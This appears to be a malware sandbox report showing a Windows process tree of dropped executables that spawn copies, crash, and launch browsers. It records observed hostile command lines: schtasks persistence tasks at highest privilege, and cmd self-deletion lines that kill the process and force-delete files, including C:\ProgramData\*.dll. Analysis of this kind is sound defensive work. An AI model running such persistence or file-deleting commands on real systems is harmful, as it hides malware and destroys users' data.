    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:28988
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:29176
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:29572
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:29016
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:26692
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:13560
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:24688
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:28912
- C:\Users\Admin\Documents\C_DaOt6CF3eDzLnSX5kmf6cC.exe
  "C:\Users\Admin\Documents\C_DaOt6CF3eDzLnSX5kmf6cC.exe"
  2⤵
  - Executes dropped EXE
  PID:1036
- - C:\Users\Admin\Documents\C_DaOt6CF3eDzLnSX5kmf6cC.exe
    "C:\Users\Admin\Documents\C_DaOt6CF3eDzLnSX5kmf6cC.exe" -u
    3⤵
    PID:5552
- C:\Users\Admin\Documents\DHak7IIGkqqpRKtZvcLSdBEB.exe
  "C:\Users\Admin\Documents\DHak7IIGkqqpRKtZvcLSdBEB.exe"
  2⤵
  - Executes dropped EXE
  PID:1032
- C:\Users\Admin\Documents\X8IftiiJu_hVVLheandICplv.exe
  "C:\Users\Admin\Documents\X8IftiiJu_hVVLheandICplv.exe"
  2⤵
  - Executes dropped EXE
  PID:1692
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:6068
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      PID:6224
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    3⤵
    PID:10000
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff82e734f50,0x7ff82e734f60,0x7ff82e734f70
      4⤵
      PID:10204
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1540 /prefetch:2
      4⤵
      PID:9184
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1808 /prefetch:8
      4⤵
      PID:7640
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2156 /prefetch:8
      4⤵
      PID:10292
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:1
      4⤵
      PID:10536
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2604 /prefetch:1
      4⤵
      PID:10568
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
      4⤵
      PID:10696
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
      4⤵
      PID:6996
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
      4⤵
      PID:10572
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
      4⤵
      PID:6784
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
      4⤵
      PID:10976
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:8
      4⤵
      PID:9168
  - - C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
      4⤵
      PID:3868
    - - C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff63f36a890,0x7ff63f36a8a0,0x7ff63f36a8b0
        5⤵
        
        PID:2756
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:8
      4⤵
      PID:10644
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1404 /prefetch:8
      4⤵
      PID:10572
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,5709150766489923153,3514435775875562179,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5628 /prefetch:2
      4⤵
      PID:11924
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C taskkill /F /PID 1692 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\X8IftiiJu_hVVLheandICplv.exe"
    3⤵
    PID:9748
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /PID 1692
      4⤵
      Kills process with taskkill
      PID:9292
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C taskkill /F /PID 1692 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\X8IftiiJu_hVVLheandICplv.exe"
    3⤵
    PID:9804
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /PID 1692
      4⤵
      Kills process with taskkill
      PID:9484
- C:\Users\Admin\Documents\Bk10Kb_FJI2mfpl9PHIG9ymN.exe
  "C:\Users\Admin\Documents\Bk10Kb_FJI2mfpl9PHIG9ymN.exe"
  2⤵
  - Executes dropped EXE
  PID:4044
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 660
    3⤵
    - Program crash
    PID:5740
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 676
    3⤵
    - Program crash
    PID:3188
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 1124
    3⤵
    - Program crash
    PID:7152
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 1180
    3⤵
    - Program crash
    PID:4328
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 1116
    3⤵
    - Program crash
    PID:6472
- C:\Users\Admin\Documents\6Ll5hxT_BqrnWPKo6C8WDZ1F.exe
  "C:\Users\Admin\Documents\6Ll5hxT_BqrnWPKo6C8WDZ1F.exe"
  2⤵
  - Executes dropped EXE
  PID:3976
- C:\Users\Admin\Documents\53neRI0L1ONhKJanPgz8Q34f.exe
  "C:\Users\Admin\Documents\53neRI0L1ONhKJanPgz8Q34f.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:512
- - C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe
    "C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"
    3⤵
    PID:6292
  - - C:\Users\Admin\Documents\fFnQEBmj_iLThTFgsZaJ42gm.exe
      "C:\Users\Admin\Documents\fFnQEBmj_iLThTFgsZaJ42gm.exe"
      4⤵
      PID:5584
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 384
        5⤵
        Program crash
        
        PID:7592
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 364
        5⤵
        Program crash
        
        PID:7888
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 424
        5⤵
        Program crash
        
        PID:9048
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 620
        5⤵
        Program crash
        
        PID:6888
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 656
        5⤵
        Program crash
        
        PID:9456
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 712
        5⤵
        Program crash
        
        PID:10236
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 620
        5⤵
        Program crash
        
        PID:10020
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 680
        5⤵
        Program crash
        
        PID:5212
  - - C:\Users\Admin\Documents\QGu7z6luoHljvvsgvo0QEum3.exe
      "C:\Users\Admin\Documents\QGu7z6luoHljvvsgvo0QEum3.exe"
      4⤵
      PID:8520
    - - C:\Users\Admin\AppData\Roaming\8745441.exe
        
        "C:\Users\Admin\AppData\Roaming\8745441.exe"
        5⤵
        
        PID:9840
    - - C:\Users\Admin\AppData\Roaming\6861779.exe
        
        "C:\Users\Admin\AppData\Roaming\6861779.exe"
        5⤵
        
        PID:9960
    - - C:\Users\Admin\AppData\Roaming\5971527.exe
        
        "C:\Users\Admin\AppData\Roaming\5971527.exe"
        5⤵
        
        PID:10028
    - - C:\Users\Admin\AppData\Roaming\5413664.exe
        
        "C:\Users\Admin\AppData\Roaming\5413664.exe"
        5⤵
        
        PID:8284
    - - C:\Users\Admin\AppData\Roaming\3520423.exe
        
        "C:\Users\Admin\AppData\Roaming\3520423.exe"
        5⤵
        
        PID:8196
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6964
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6936
- C:\Users\Admin\Documents\KbgnK2Si8dTYTPzZ77fZsXV0.exe
  "C:\Users\Admin\Documents\KbgnK2Si8dTYTPzZ77fZsXV0.exe"
  2⤵
  - Executes dropped EXE
  PID:1724
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 364
    3⤵
    - Program crash
    PID:5792
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 608
    3⤵
    - Program crash
    PID:2912
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 676
    3⤵
    - Program crash
    PID:6552
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 692
    3⤵
    - Program crash
    PID:4968
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 680
    3⤵
    - Program crash
    PID:5272
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 768
    3⤵
    - Program crash
    PID:4112
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 856
    3⤵
    - Program crash
    PID:10188
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 712
    3⤵
    - Program crash
    PID:10024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 584
    3⤵
    PID:7972
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 688
    3⤵
    PID:23076
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 836
    3⤵
    PID:25956
- C:\Users\Admin\Documents\y33ZOqaPApOoZ98jZpUGwX21.exe
  "C:\Users\Admin\Documents\y33ZOqaPApOoZ98jZpUGwX21.exe"
  2⤵
  - Executes dropped EXE
  PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im y33ZOqaPApOoZ98jZpUGwX21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\y33ZOqaPApOoZ98jZpUGwX21.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:8108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im y33ZOqaPApOoZ98jZpUGwX21.exe /f
      4⤵
      Kills process with taskkill
      PID:5640
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:10992
- C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
  "C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2900
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5112
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:4876
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:2060
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5080
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:1476
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5352
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5908
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:2284
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:4952
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:4780
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:5580
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:6440
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:6968
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:6296
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:2332
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:6172
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7036
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:3340
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:6980
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:4724
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7756
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8104
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8104 -s 24
      4⤵
      Program crash
      PID:6288
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7436
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:3480
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:6696
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7596
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8056
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8276
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8448
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8724
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8980
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:2016
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:9000
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:952
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8304
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:8796
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:3932
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:4528
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:6968
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7288
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:4304
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:9516
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:9876
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7840
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:9936
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:4760
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:10128
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:7696
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:10180
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10180 -s 24
      4⤵
      Program crash
      PID:9208
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:9680
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:10660
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:11032
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:10732
- - C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    C:\Users\Admin\Documents\RPc9vbGlkPQzxkV_DqaGs2vb.exe
    3⤵
    PID:10492
